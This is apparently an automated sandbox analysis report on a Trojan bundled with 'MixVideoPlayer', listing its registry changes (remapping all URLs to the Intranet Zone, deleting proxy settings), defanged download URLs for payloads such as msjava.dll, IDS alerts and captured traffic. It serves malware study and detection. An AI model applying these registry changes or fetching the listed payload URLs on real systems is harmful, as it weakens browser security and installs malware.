[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Type" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Count" = "28"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Type" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Time" = "DF 07 06 00 00 00 1C 00 05 00 30 00 05 00 4A 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MixVideoPlayer\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Count" = "28"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "MixVideoPlayer.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Time" = "DF 07 06 00 00 00 1C 00 05 00 30 00 05 00 4A 01"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E5 FB 1A 32 68 26 FF A6 A7 02 5B A9 BD B2 EF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MixVideoPlayer\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process LTV2.exe:556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 0B 68 DF 4F 56 0E C1 7D 89 AB 22 82 A2 6D 93"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\LTV2\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\LTV2\DEBUG]
"Trace Level"

The process LTV2.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 59 D4 59 E2 1E 09 7A 3C 37 DD 54 0C DC 5C 04"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process LTV2.exe:3828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 82 DC DE BC CA 9F B3 B0 FA 51 25 8E 27 6B 66"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process %original file name%.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\f6c0be2d-f27d-4e15-a611-17b6bfc0345c]
"mixvideoplayersetup.exe" = "mixvideoplayersetup"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1433935981"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 4B 72 55 E9 92 76 CE 95 58 DA 28 35 0F DC F4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BrowserWeb.exe:3820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 A1 3D E2 3A 64 26 C8 A0 21 68 D3 CD F2 CB 19"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
8aa75c91d0009c95c161aa88157bfc52
094765d7b7e5439955ed3acf8969a69c

URLs

URL	IP
hxxp://api.magnofiler.com/	54.148.102.220
hxxp://api.magnofiler.com/d5/msjava.dll	54.148.102.220
hxxp://api.magnofiler.com/?ctrak3.2.614=c_Start_Application	54.148.102.220
hxxp://api.magnofiler.com/040bf155cdc35c2a206dc876267f6d44d0241d20905aaee4793e7b4ca4eefde7809f2b49f84688188854ab2b9139c8ea439cce87b9a53f92e4adae67440907af1badca16ac7907894d654e60e63e0c28075042ab211bc5fc0ba6f17e7015222f8de0bc46898bb29a	54.148.102.220
hxxp://api.magnofiler.com/fdd38805b7c819802cbd31bf75157c25b18344f46b22d1305ec5a34db400c252cc764e2deab801466f546f3fbea20ad7ff76bed97ca1888d	54.148.102.220
hxxp://api.magnofiler.com/__maxpower__/render_template/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab?language_code=en	54.148.102.220
hxxp://api.magnofiler.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/style.css	54.148.102.220
hxxp://api.magnofiler.com/maxpower-static/apps/34/68794/css/style.css	54.148.102.220
hxxp://api.magnofiler.com/__maxpower__/render_screen/2014/11/8b9c3fb4-73d0-11e4-925e-06a3579b0dab/screen_variation=videoUpdater	54.148.102.220
hxxp://api.magnofiler.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/i-download.png	54.148.102.220
hxxp://api.magnofiler.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loading-install.gif	54.148.102.220
hxxp://api.magnofiler.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif	54.148.102.220
hxxp://api.magnofiler.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/progress-bar.png	54.148.102.220
hxxp://www.magnofiler.com/BesH3gE9/pop-up/	54.186.187.58
hxxp://staticrr.tgusrv.com/sdb/84/MixVideoPlayerSetup.exe
hxxp://www.magnofiler.com/lpresources/js/linkv2.js	54.186.187.58
hxxp://www.magnofiler.com/lpresources/js/ainj.js	54.186.187.58
hxxp://www.magnofiler.com/lpresources/js/dlStoragev1.js	54.186.187.58
hxxp://www.magnofiler.com/mh/53a811d55f1c1e744b000002/2307c835-660a-4bd8-a3df-031d9af89e85/53a811d55f1c1e744b000002/default/media/js/jquery-1.11.1.min.js	54.186.187.58
hxxp://n149adserv.com/js/show_ads.js	204.155.152.38
hxxp://api.magnofiler.com/0a47f93be658c7bb00d558b4ec90421a71854a2101d389448776a4db9bb9613346e46f6b897f310e54c5e69f1cff337c65944ddcddf9c379	54.148.102.220
hxxp://n149adserv.com/ads-sync.js?v=1&key=8807bef3df789cfc967df2f12545a152&ch=&click=&tz=3&t=1435470398142&requestUrl=http://www.magnofiler.com/BesH3gE9/pop-up/&requestRef=&flashVer=11.6 r602&scrWidth=1916&scrHeight=902&cIds=	204.155.152.38
hxxp://api.magnofiler.com/__maxpower__/render_screen/2014/11/a888aa68-73d0-11e4-b71d-06a3579b0dab/screen_variation=videoUpdater	54.148.102.220
hxxp://api.magnofiler.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/bullet-short.gif	54.148.102.220
hxxp://n149adserv.com/impression.gif?b=578&p=27&ch=&ap=&cps=&c=62&l=UA&h=f06adb393bb490dc4c52810f86c8f01c&t=1435470399377&s=c47076fae961fb2577a65c66edeb9402	204.155.152.38
hxxp://network.adsmarket.com/click/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SYmGakfZSJkGqaYKOBl7dia5Vmon2X?dp=Mjd8NTc4fFVBfDF8MXx8|34ee69d9819b5a94df7268d81470e3f3-17-62|07032691-1d59-11e5-9d25-f8bc125381b8	193.169.104.1
hxxp://5efl2.x.incapdns.net/?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000.&ce_cid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000.
hxxp://wsf13-1390884529.us-east-1.elb.amazonaws.com/?s1=&s2=&s3=
hxxp://8mdzz.exclusiverewards.7015.info/?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68
hxxp://googleapis.l.google.com/ajax/libs/jquery/1.10.2/jquery.min.js
hxxp://8mdzz.exclusiverewards.7015.info/templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style.css
hxxp://8mdzz.exclusiverewards.7015.info/templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style-ie.css
hxxp://8mdzz.exclusiverewards.7015.info/templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/js/script.js
hxxp://staticrr.tgusrv.com/sdb/df/ffmpeg.zip
hxxp://ltv-pre.tguhost.com/ltv/install/?idapp=23&action=install&mac=0050563B0E71&country=US	54.213.145.21
hxxp://staticrr.tgusrv.com/sdb/1d/MixVideoPlayerUpdate.xml?2b955ad6-c3ec-4307-9af7-0cf289b4016b
hxxp://staticrr.tgusrv.com/sdb/1d/MixVideoPlayerUpdate.xml?5ac7d5d9-ec86-4754-9f48-546c2a60c63f
hxxp://staticrr.tgusrv.com/sdb/e0/WebBrowser.xml?73a627b4-0b69-4c55-b6a2-57d86b70d2fa
hxxp://staticrr.mixvideoplayer.com/sdb/1d/MixVideoPlayerUpdate.xml?2b955ad6-c3ec-4307-9af7-0cf289b4016b	85.12.5.27
hxxp://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js	216.58.209.170
hxxp://staticrr.mixvideoplayer.com/sdb/84/MixVideoPlayerSetup.exe	85.12.5.27
hxxp://3p6.popularfastchannel.com/?s1=&s2=&s3=	54.243.224.137
hxxp://static.magnofiler.com/d5/msjava.dll	54.148.102.220
hxxp://staticrr.mixvideoplayer.com/sdb/1d/MixVideoPlayerUpdate.xml?5ac7d5d9-ec86-4754-9f48-546c2a60c63f	85.12.5.27
hxxp://staticrr.mixvideoplayer.com/sdb/df/ffmpeg.zip	85.12.5.27
hxxp://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml?73a627b4-0b69-4c55-b6a2-57d86b70d2fa	85.12.5.27
hxxp://www.webtrackerplus.com/?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000.&ce_cid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000.	192.230.78.223
ssl.google-analytics.com	173.194.113.222

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (Session) - Possible Trojan-Clicker
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/style.css HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: text/css

Date: Sun, 28 Jun 2015 05:46:22 GMT

ETag: "54f6e242-4a5a"

